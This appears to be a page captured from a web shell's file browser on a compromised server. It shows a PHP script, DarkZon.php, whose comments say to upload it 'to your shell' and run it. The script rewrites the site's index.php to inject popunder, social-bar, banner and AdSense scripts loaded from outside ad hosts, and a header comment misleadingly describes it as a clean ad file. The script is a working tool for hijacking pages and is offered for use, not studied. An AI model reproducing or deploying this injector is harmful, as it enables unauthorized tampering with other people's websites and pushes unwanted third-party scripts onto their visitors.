HEX
Server: Apache
System: Linux b:u:marcbase:1 3.10.0-1160.31.1.el7.x86_64 #1 SMP Thu Jun 10 13:32:12 UTC 2021 x86_64
User: apache (92344)
PHP: 7.0.18
Disabled: apache_get_modules, apache_get_version, apache_reset_timeout, apache_getenv, apache_note, apache_setenv
$ pwd: /var/www/html/marcbase.com.br/web/
Upload Files
File: /var/www/html/marcbase.com.br/web/DarkZon.php
<?php
// DarkZon.php
// Clean Adsterra ad file (manual placement).
// Use: <?php include 'DarkZon.php'; ?>
?>


<?php
// DarkZon.php
// Upload to your shell and visit this file in browser to auto-inject ads into index.php
// Creates a timestamped backup before modifying.
// Idempotent: will not inject twice if already injected by this script.

// ---------------------- CONFIG ----------------------
$target = 'index.php'; // target file to modify (default index.php)
$make_backup = true;   // set false to skip backup (NOT recommended)
// ---------------------- END CONFIG ------------------

// Ads blocks (you can edit these blocks if you want different ad code)
$marker_start = "<!-- AUTO-ADS-INJECTED-START -->";
$marker_end   = "<!-- AUTO-ADS-INJECTED-END -->";

$ads_head = <<<HEAD
$marker_start
<!-- Popunder Ads (injected by auto-inject-ads-with-backup.php) -->
<script src='//pl27753953.revenuecpmgate.com/81/4c/da/814cda2dc58eede0f8f6ad16c0fa1511.js' type='text/javascript'></script>
<script type='text/javascript' src='//pl27680446.revenuecpmgate.com/99/9b/bb/999bbb6f1df696b2662173e5bb090375.js'></script>
<script type='text/javascript' src='//pl27662477.revenuecpmgate.com/3b/2f/f3/3b2ff3dcba1a3ec0ad9421bc9aa20f1f.js'></script>
$marker_end
HEAD;

$ads_body_top = <<<BODYTOP
$marker_start
<!-- Social Bar (body top) -->
<div class="auto-ads-socialbar">
<script type='text/javascript' src='//pl27759380.revenuecpmgate.com/8b/31/26/8b3126006a98ef7922843213c8d6022e.js'></script>
<script type='text/javascript' src='//pl27675952.revenuecpmgate.com/2c/9d/e9/2c9de90a1e98903c316af5a9b805f018.js'></script>
<script type='text/javascript' src='//pl27753938.revenuecpmgate.com/48/a2/e7/48a2e77385a6cd1cf37d2cf1037f7262.js'></script>
</div>
$marker_end
BODYTOP;

$ads_body_end = <<<BODYEND
$marker_start
<!-- Banner & Native Ads (body end) -->
<div class="auto-ads-banner">
    <script type="text/javascript">
        atOptions = {'key':'07d451c005d62e1997f7144dd5b476d7','format':'iframe','height':50,'width':320,'params':{}};
    </script>
    <script type="text/javascript" src="//www.highperformanceformat.com/07d451c005d62e1997f7144dd5b476d7/invoke.js"></script>
</div>

<div class="auto-ads-banner">
    <script type="text/javascript">
        atOptions = {'key':'29fc5488196fbeae5976f5028a9a6ba6','format':'iframe','height':60,'width':468,'params':{}};
    </script>
    <script type="text/javascript" src="//www.highperformanceformat.com/29fc5488196fbeae5976f5028a9a6ba6/invoke.js"></script>
</div>

<div class="auto-ads-native">
    <script async="async" data-cfasync="false" src="//pl27680466.revenuecpmgate.com/d168c5688a30b9321ca53a09d0259b8e/invoke.js"></script>
    <div id="container-d168c5688a30b9321ca53a09d0259b8e"></div>
</div>

<!-- Google Ads -->
<script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js?client=ca-pub-5687172125293082"
     crossorigin="anonymous"></script>
$marker_end
BODYEND;

// -------------------- helper functions --------------------
function errorAndExit($msg) {
    echo "<h3 style='color:darkred'>Error:</h3><pre>$msg</pre>";
    exit;
}

function safeWriteFile($path, $content) {
    $tmp = $path . '.tmp-' . uniqid();
    if (file_put_contents($tmp, $content) === false) return false;
    // rename is atomic on same filesystem
    if (!rename($tmp, $path)) {
        @unlink($tmp);
        return false;
    }
    return true;
}

// -------------------- main --------------------
echo "<h2>Auto Ads Injector</h2>";
echo "<p>Target file: <strong>" . htmlspecialchars($target) . "</strong></p>";

// check existence
if (!file_exists($target)) {
    echo "<p style='color:orange'>Target file <strong>$target</strong> not found in this directory.</p>";
    echo "<p>You can still keep this script here. Uploading it won't modify anything until <code>$target</code> exists in the same folder.</p>";
    exit;
}

// read file
$orig = @file_get_contents($target);
if ($orig === false) errorAndExit("Cannot read $target. Permission denied?");

// check if already injected (search for our unique marker)
if (strpos($orig, $marker_start) !== false && strpos($orig, $marker_end) !== false) {
    echo "<p style='color:green'>Looks like ads are already injected (marker found). No changes made.</p>";
    echo "<p>If you want to re-inject, remove the existing injected block from $target or restore backup and run again.</p>";
    exit;
}

// create backup
if ($make_backup) {
    $ts = date('Ymd_His');
    $backup_name = $target . '.bak.' . $ts;
    if (@copy($target, $backup_name)) {
        echo "<p style='color:green'>Backup created: <strong>$backup_name</strong></p>";
    } else {
        echo "<p style='color:orange'>Warning: Could not create backup file. Check write permissions. Aborting for safety.</p>";
        exit;
    }
}

// now perform injection
$modified = $orig;
$injected_any = false;

// 1) inject into head (before </head>)
if (stripos($modified, '</head>') !== false) {
    $modified = preg_replace('/<\/head>/i', $ads_head . "\n</head>", $modified, 1);
    $injected_any = true;
} else {
    // no head tag found: try to insert near start (after doctype/html tag)
    // insert right after opening <html> or at beginning
    if (preg_match('/<html[^>]*>/i', $modified, $m)) {
        $modified = str_replace($m[0], $m[0] . "\n" . $ads_head, $modified);
        $injected_any = true;
    } else {
        // prepend to file
        $modified = $ads_head . "\n" . $modified;
        $injected_any = true;
    }
}

// 2) inject body top (right after opening <body...>)
if (preg_match('/<body[^>]*>/i', $modified, $m)) {
    // make sure we don't inject twice: but we already checked markers earlier
    $modified = preg_replace('/(<body[^>]*>)/i', "$1\n" . $ads_body_top, $modified, 1);
    $injected_any = true;
} else {
    // if no body tag, try to place after head or before content
    // if we added head earlier, try to put body top after head block
    $pos_head = stripos($modified, $marker_end);
    if ($pos_head !== false) {
        $insert_pos = $pos_head + strlen($marker_end);
        $modified = substr_replace($modified, "\n" . $ads_body_top, $insert_pos, 0);
        $injected_any = true;
    }
}

// 3) inject body end (before </body>)
if (stripos($modified, '</body>') !== false) {
    $modified = preg_replace('/<\/body>/i', $ads_body_end . "\n</body>", $modified, 1);
    $injected_any = true;
} else {
    // append to end
    $modified = $modified . "\n" . $ads_body_end;
    $injected_any = true;
}

// write back
if (!$injected_any) {
    errorAndExit("No suitable injection points found. No changes made.");
}

// attempt safe write
if (!safeWriteFile($target, $modified)) {
    errorAndExit("Failed to write modified content to $target. Check permissions.");
}

echo "<p style='color:green'>Ads injected successfully into <strong>$target</strong>.</p>";
echo "<p>If something goes wrong, restore the backup file: <code>mv " . htmlspecialchars($backup_name) . " " . htmlspecialchars($target) . "</code></p>";
echo "<h4>Notes & Tips</h4>";
echo "<ul>
<li>Script will not inject again if it sees the marker. To re-inject, remove existing injected block from $target or restore original from backup and run again.</li>
<li>If your index.php is in a different directory, upload this injector to that directory or change the <code>\$target</code> variable at top.</li>
<li>Make sure the webserver user has write permission to the file and directory (CHMOD appropriately). Use with caution.</li>
<li>Some hosting panels (shared hosts) block direct editing or may auto-restore files — if injection fails, check host restrictions.</li>
</ul>";

?>
@ Telegram